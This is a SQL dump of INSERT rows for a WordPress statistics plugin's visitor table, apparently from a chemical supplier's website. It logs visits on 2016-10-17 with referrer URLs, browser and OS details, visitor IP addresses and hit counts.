INSERT INTO `wp_statistics_visitor` VALUES (5131, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5132, '2016-10-17', 'https://www.google.de/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.31.28.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5133, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.172.98.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5134, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.150.79.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5135, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.37.188.65', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5136, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Macintosh', '35.0', '', '192.126.162.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5137, '2016-10-17', 'https://www.miller-stephenson.com/author/zayyan/', 'Firefox', 'Macintosh', '35.0', '', '188.208.1.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5138, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.246.91.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5139, '2016-10-17', 'https://crazyboost.pro/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5140, '2016-10-17', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjVifSd9uHPAhUQRH4KHUh9DuUYABAA&sig=AOD64_01EBOBVG2-RF8Mrmkui5EswPMFgw&rct=j&q=&ved=0ahUKEwitgO6d9uHPAhVE44MKHdXyALAQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '10.11.245.64', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5141, '2016-10-17', 'https://www.google.se/', 'Firefox', 'Windows', '49.0', '', '185.55.11.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5142, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '160.42.85.8', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5143, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.124.100.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5144, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5145, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5146, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.134.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5147, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjNjOn89-HPAhVCKCYKHSEqDEUQFggtMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '71.86.38.114', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5148, '2016-10-17', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5149, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '204.169.30.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5150, '2016-10-17', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjk_7jW-eHPAhUXWoYKHc_SD9AYABAA&sig=AOD64_0yyyni7a34Ri1cQMnPLUvoTcrBzQ&rct=j&q=&ved=0ahUKEwiD1rPW-eHPAhWB2T4KHb5XDNMQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '50.59.104.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5151, '2016-10-17', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '68.106.146.196', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5152, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '42.0', '', '198.12.129.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5153, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '173.48.254.6', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5154, '2016-10-17', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjt8unj-eHPAhVShH4KHfVlBp8YABAK&sig=AOD64_1StJG3T3pn-8XuqMOoriDT_og3hA&rct=j&q=&ved=0ahUKEwi78eXj-eHPAhXqx4MKHe-9BIYQ0QwIMA&adurl=', 'MSIE', 'Windows', '11.0', '', '75.98.191.29', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5155, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '49.0', '', '71.93.204.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5156, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5157, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.212.225.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5158, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.68.233.183', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5159, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '66.87.81.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5160, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5161, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.78.29.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5162, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwi7l6PC_uHPAhUDw4MKHQfTBXUQFggnMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-143xd%2F&usg=AFQjCNHP6Hsk0H4yFQl8sisQUbeTuk3z_Q&bvm=bv.135974163,d.cGw', 'MSIE', 'Windows', '11.0', '', '192.146.217.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5163, '2016-10-17', 'https://chemicalengineering.hotims.com/r5/search.asp?return_by_category=y&action=search-eresp&s_type=&pub_id=224&order_by=&rows_per_page=1000&mc=ChemEng_October2016&email=microfinespeciality%40gmail.com&eresponse=1&category_id=52031&category_id=52039&category_id=52041&category_id=52037&category_id=52040&category_id=52028&category_id=52035&category_id=52038&category_id=52036&category_id=52029&category_id=52034', 'Firefox', 'Windows', '49.0', '', '116.74.219.208', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5164, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.184.109.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5165, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.188.127.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5166, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.147.150.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5167, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.39.53.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5168, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.91.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5169, '2016-10-17', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '68.248.209.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5170, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '12.229.172.130', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5171, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '50.198.22.188', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5172, '2016-10-17', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '173.163.13.165', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5173, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.151.110.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5174, '2016-10-17', 'https://www.google.com.tw/', 'Chrome', 'Windows', '53.0.2785.143', '', '1.164.146.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5175, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.107.125.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5176, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.131.95.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5177, '2016-10-17', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.116', '', '207.107.64.185', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5178, '2016-10-17', 'https://www.google.co.jp/', 'Chrome', 'Windows', '53.0.2785.143', '', '49.129.43.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5179, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '66.87.148.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5180, '2016-10-17', 'https://www.google.de', 'Firefox', 'Windows', '47.0', '', '141.76.97.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5181, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '88.79.164.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5182, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5183, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5184, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.172.30.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5185, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.211.113.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5186, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '122.90.140.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5187, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwiNk7DJh-LPAhWkNJoKHVEFBZ4QFgg6MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-52-radical-initiator%2F&usg=AFQjCNFreklW0x11g4z9AuGbNe6ZOMXXmw&bvm=bv.135974163,d.bGg', 'MSIE', 'Windows', '11.0', '', '143.16.83.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5188, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '90.188.38.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5189, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.243.8.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5190, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.207.249.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5191, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '39.0', '', '118.193.131.160', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5192, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.208.102.51', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5193, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.155.89.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5194, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.49.219.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5195, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '130.255.60.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5196, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '104.240.103.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5197, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjZtrzXieLPAhXH7IMKHWFWDsMQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.amc', 'MSIE', 'Windows', '11.0', '', '69.228.34.51', '000', 31, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5198, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiuoKKJiuLPAhWFeSYKHY7eCwUQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '10.98.18.32', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5199, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.167.75.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5200, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5201, '2016-10-17', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '184.2.141.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5202, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.89', '', '199.107.68.203', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5203, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.237.131.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5204, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.163.9.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5205, '2016-10-17', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiDs_fEjOLPAhXBWoYKHZ4vAQMYABAA&sig=AOD64_0o9WNq2QnimicdJ8DY96KDG7dMVw&rct=j&q=&ved=0ahUKEwj-gfPEjOLPAhVBez4KHaEUDt0Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '206.47.93.130', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5206, '2016-10-17', 'https://www.google.ca/', 'Safari', 'iPad', '9.0', '', '99.255.82.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5207, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.96.109.241', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5208, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.201.122.226', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5209, '2016-10-17', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.118.209.222', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5210, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.211.100.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5211, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.166.79.195', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5212, '2016-10-17', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwi3wpPWjuLPAhWDgGkKHXLSAD8YABAM&sig=AOD64_1-LoQsgZbZgpIipACWeEBChPJoug&rct=j&q=&ved=0ahUKEwjW_4vWjuLPAhVIKiYKHYThDtcQ0QwIhQE&adurl=', 'MSIE', 'Windows', '11.0', '', '162.255.148.135', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5213, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5214, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5215, '2016-10-17', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.239.0.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5216, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '76.224.211.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5217, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.1.148.130', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5218, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '159.118.170.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5219, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5220, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5221, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '97.127.118.27', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5222, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5223, '2016-10-17', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjdmeWhk-LPAhXDJIYKHbkSBysYABAA&sig=AOD64_0aBoC5pMkL8xv1fxeUp3OzLdUP0Q&rct=j&q=&ved=0ahUKEwjh1eKhk-LPAhUBpB4KHZDgB90Q0QwIaQ&adurl=', 'MSIE', 'Windows', '11.0', '', '128.84.124.116', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5224, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwijgY3Wk-LPAhVF4yYKHe9kB7sQFghQMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Flubricants%2Fkrytox-lubricants%2Fkrytox-nrt%2Fkrytox-nrt-8900-series%2F&usg=AFQjCNHBKWiq_7d4YMg0K2YZJxLDHR1DnA', 'MSIE', 'Windows', '11.0', '', '199.116.246.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5225, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwij1sbllOLPAhUI4SYKHULqDMwQFgg8MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmil-prf-27617-greases%2Fshutterstock_405633937%2F&usg=AFQjCNFtbFNO65VVeiNQwdgN6ilxgMOWsg&sig2=WTOiz8mBxVKePnTzRTqlcg', 'MSIE', 'Windows', '11.0', '', '138.162.8.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5226, '2016-10-17', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.199.212.73', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5227, '2016-10-17', 'https://storehouse.ua/', 'Opera', 'Windows', '7.54', '', '46.118.155.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5228, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjB1--0leLPAhWFcz4KHe7AAyUQjBAIJDAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '81.7.210.68', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5229, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.216.236.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5230, '2016-10-17', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.83.114.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5231, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.158.95.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5232, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.43.70.242', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5233, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '181.48.157.156', '000', 273, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5234, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '174.46.65.57', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5235, '2016-10-17', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.116', '', '70.27.26.254', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5236, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.23.180.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5237, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.2.50.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5238, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5239, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5240, '2016-10-17', 'https://r.search.yahoo.com/_ylt=A0LEV0YU9QRYJV0ART9XNyoA;_ylu=X3oDMTEyYzFyYWQ2BGNvbG8DYmYxBHBvcwMzBHZ0aWQDVUkyQzNfMQRzZWMDc3I-/RV=2/RE=1476748692/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fms-122ad%2f/RK=0/RS=9kqi.N8Cqt8ytHpygfhDj_ebvBU-', 'MSIE', 'Windows', '11.0', '', '138.64.247.15', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5241, '2016-10-17', 'https://www.miller-stephenson.com', 'Slackbot-LinkExpanding', 'Unknown', 'Unknown', '', '54.174.33.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5242, '2016-10-17', 'https://www.miller-stephenson.com', 'Slackbot-LinkExpanding', 'Unknown', 'Unknown', '', '54.89.92.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5243, '2016-10-17', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '70.53.157.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5244, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.0.64.42', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5245, '2016-10-17', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiPpu-AnOLPAhWFH4YKHTF2DJ8YABAA&sig=AOD64_1L4u1jiAy_o3BI28rf5TjpiLo0GA&rct=j&q=&ved=0ahUKEwjyveuAnOLPAhVJcD4KHSrhAOUQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '66.209.60.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5246, '2016-10-17', 'https://www.google.ru/', 'Chrome', 'Windows', '51.0.2704.103', '', '80.251.48.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5247, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5248, '2016-10-17', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '67.142.113.45', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5249, '2016-10-17', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '67.142.112.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5250, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.125.164.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5251, '2016-10-17', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiij5fZmOLPAhWDWYYKHYsoDUIYABAI&ei=aPMEWOiXO8TymAHIiKrQAw&sig=AOD64_3QiFSIwst3bjN3yIcCNOV1nVf6fw&rct=j&q=&sqi=2&ved=0ahUKEwjo65HZmOLPAhVEOSYKHUiECjoQ0QwIfA&adurl=', 'MSIE', 'Windows', '11.0', '', '73.44.49.10', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5252, '2016-10-17', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjl09qtneLPAhWCUBoKHeq5CE0QFgg4MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fopteon-sion-vapor-degreasing%2F&usg=AFQjCNHrrXIenkjoc9PHs1HOQO1P_Z07Ug&sig2=tbMrHkRZxd6uJ_zNWpbT3w', 'Firefox', 'Windows', '31.0', '', '192.54.144.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5253, '2016-10-17', 'https://www.google.co.uk/', 'Chrome', 'Android', '53.0.2785.124', '', '79.75.76.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5254, '2016-10-17', 'https://www.google.co.uk/', 'Safari', 'iPhone', '10.0', '', '82.32.48.95', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5255, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '97.77.39.130', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5256, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5257, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiY-46NoeLPAhUC6SYKHc-KAwYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=JgsZd_7QXYHFAmQ3PzzIQA&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '173.200.117.18', '000', 2, 0); 
